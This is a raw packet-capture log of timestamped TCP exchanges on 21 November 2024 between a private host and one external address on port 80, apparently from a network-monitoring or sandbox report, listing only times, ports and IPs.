                                        Nov 21, 2024 20:00:51.154330969 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.155030966 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.155086994 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.155142069 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.155833006 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.155965090 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.155988932 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.156682014 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.156729937 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.156752110 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.157510996 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.157563925 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.157572985 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.158339024 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.158381939 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.158413887 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.159116983 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.159162998 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.159213066 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.159955025 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.160020113 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.160048008 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.160842896 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.160890102 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.160895109 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.161597967 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.161644936 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.161715984 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.162471056 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.162519932 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.162538052 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.163228035 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.163280964 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.163348913 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.164119959 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.164166927 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.164177895 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.164899111 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.164952993 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.164993048 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.165782928 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.165836096 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.165908098 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.166583061 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.166623116 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.166629076 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.167377949 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.167433977 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.167485952 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.168229103 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.168273926 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.168318033 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.169044018 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.169090986 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.169131041 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.169871092 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.169919014 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.169987917 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.170701981 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.170748949 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.170753002 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.171504021 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.171552896 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.171601057 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.172362089 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.172418118 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.172533035 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.173154116 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.173201084 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.173249960 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.174020052 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.174083948 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.174096107 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.174786091 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.174858093 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.174911976 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.175621986 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.175682068 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.175733089 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.176479101 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.176523924 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.176553965 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.177256107 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.177304983 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.177388906 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.178093910 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.178138971 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.178184986 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.178944111 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.178961992 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.178996086 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.179744959 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.179801941 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.179866076 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.180572987 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.180619955 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.180620909 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.181427002 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.181474924 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.181531906 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.182229996 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.182251930 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.182281971 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.183074951 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.183120012 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.183125973 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.183859110 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.183906078 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.183953047 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.184696913 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.184743881 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.184746981 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.185513973 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.185559988 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.185612917 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.186342001 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.186387062 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.186461926 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.187170029 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.187215090 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.187261105 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.187997103 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.188045025 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.188150883 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.188796997 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.188880920 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.188893080 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.189685106 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.189735889 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.189781904 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.190478086 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.190517902 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.190526009 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.231395006 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.265942097 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.265995979 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.266050100 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.266251087 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.266403913 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.266453028 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.266952038 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.267121077 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.267187119 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.267766953 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.309508085 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.351754904 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.351828098 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.351949930 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.352108955 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.352230072 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.352292061 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.352694035 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.352804899 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.352880955 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.353519917 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.353636980 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.353692055 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.354351044 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.354465961 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.354516983 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.355170012 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.355393887 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.355468035 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.356089115 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.356338024 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.356395006 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.356786013 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.356962919 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.357016087 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.357656956 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.357790947 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.357845068 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.358478069 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.358632088 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.358685970 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.359335899 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.359397888 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.359445095 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.360141039 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.360272884 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.360325098 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.360951900 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.361124039 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.361187935 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.361860037 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.361896992 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.361944914 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.362567902 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.403264046 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.417032003 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:51.537223101 CET8049909178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:51.537400961 CET4990980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:54.215517044 CET4992580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:54.483232021 CET8049925178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:54.483338118 CET4992580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:54.483695030 CET4992580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:54.603303909 CET8049925178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:55.794033051 CET8049925178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:55.808084965 CET4992580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:55.928863049 CET8049925178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:55.929115057 CET4992580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:56.150432110 CET4993080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:56.270100117 CET8049930178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:56.274178982 CET4993080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:56.286088943 CET4993080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:56.405761957 CET8049930178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:57.611834049 CET8049930178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:57.620837927 CET4993080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:57.740709066 CET8049930178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:57.746081114 CET4993080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:58.286252975 CET4993680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:58.411377907 CET8049936178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:58.414222956 CET4993680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:58.415659904 CET4993680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:58.535348892 CET8049936178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:59.779395103 CET8049936178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:59.790131092 CET4993680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:59.910146952 CET8049936178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:59.910928011 CET4993680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:00.094654083 CET4987480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:00.094960928 CET4994180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:00.216655016 CET8049874178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:00.216703892 CET8049941178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:00.216937065 CET4994180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:00.217163086 CET4994180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:00.337965012 CET8049941178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:01.533435106 CET8049941178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:01.533499956 CET4994180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:01.614567041 CET4994580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:01.734236956 CET8049945178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:01.734323025 CET4994580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:01.734539032 CET4994580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:01.854105949 CET8049945178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:03.043689966 CET8049945178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:03.044308901 CET4994580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:03.164519072 CET8049945178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:03.164608955 CET4994580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:03.967791080 CET4995180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:04.088615894 CET8049951178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:04.088706970 CET4995180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:04.090903997 CET4995180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:04.211220026 CET8049951178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:05.378820896 CET8049951178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:05.379426003 CET4995180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:05.499717951 CET8049951178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:05.499800920 CET4995180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:05.828604937 CET4995580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:05.948219061 CET8049955178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:05.948504925 CET4995580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:05.948683977 CET4995580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:06.070888042 CET8049955178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:06.624588013 CET8049941178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:06.624699116 CET4994180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:07.275743961 CET8049955178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:07.276504040 CET4995580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:07.396562099 CET8049955178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:07.396657944 CET4995580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:07.961837053 CET4996180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:08.082376003 CET8049961178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:08.082583904 CET4996180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:08.090935946 CET4996180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:08.210572004 CET8049961178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:09.340446949 CET8049961178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:09.341108084 CET4996180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:09.461426020 CET8049961178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:09.461560965 CET4996180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:12.368318081 CET4997280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:12.488024950 CET8049972178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:12.488173962 CET4997280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:12.497273922 CET4997280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:12.616929054 CET8049972178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:13.855789900 CET8049972178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:13.860172987 CET4997280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:13.981861115 CET8049972178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:13.982006073 CET4997280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:14.696871042 CET4997880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:14.817615986 CET8049978178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:14.817711115 CET4997880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:14.825248003 CET4997880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:14.944987059 CET8049978178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:16.134665966 CET8049978178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:16.135330915 CET4997880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:16.255703926 CET8049978178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:16.255886078 CET4997880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:17.505594015 CET4998480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:17.518269062 CET4998580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:17.625329018 CET8049984178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:17.625461102 CET4998480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:17.637731075 CET4998480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:17.637830019 CET8049985178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:17.637901068 CET4998580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:17.653348923 CET4998580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:17.757424116 CET8049984178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:17.773062944 CET8049985178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:18.887870073 CET8049984178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:18.888510942 CET4998480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:19.008475065 CET8049984178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:19.008526087 CET4998480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:19.021061897 CET8049985178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:19.021619081 CET4998580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:19.073940039 CET4994180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:19.074222088 CET4998680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:19.141591072 CET8049985178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:19.141644001 CET4998580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:19.179855108 CET4998780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:19.193608999 CET8049941178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:19.193762064 CET8049986178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:19.193851948 CET4998680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:19.232234955 CET4998680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:19.299479961 CET8049987178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:19.299561024 CET4998780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:19.299710989 CET4998780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:19.352564096 CET8049986178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:19.419198036 CET8049987178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:20.581027031 CET8049986178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:20.581192970 CET4998680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:20.629930973 CET8049987178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:20.630625010 CET4998780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:20.750577927 CET8049987178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:20.754190922 CET4998780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:22.350770950 CET4999880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:22.476736069 CET8049998178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:22.476844072 CET4999880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:22.481530905 CET4999880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:22.605561972 CET8049998178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:23.195102930 CET4999980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:23.314961910 CET8049999178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:23.316236973 CET4999980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:23.325367928 CET4999980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:23.444827080 CET8049999178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:23.786011934 CET8049998178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:23.786664009 CET4999880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:23.906932116 CET8049998178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:23.907042027 CET4999880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:24.623718977 CET8049999178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:24.654350042 CET4999980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:24.774988890 CET8049999178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:24.775130033 CET4999980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:24.906481981 CET4998680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:24.906790972 CET5000580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:25.026546001 CET8050005178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:25.026597977 CET8049986178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:25.026618958 CET5000580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:25.026696920 CET4998680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:25.026915073 CET5000580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:25.033303022 CET5000680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:01:25.146456957 CET8050005178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:01:25.153276920 CET8050006178.215.224.74192.168.2.4
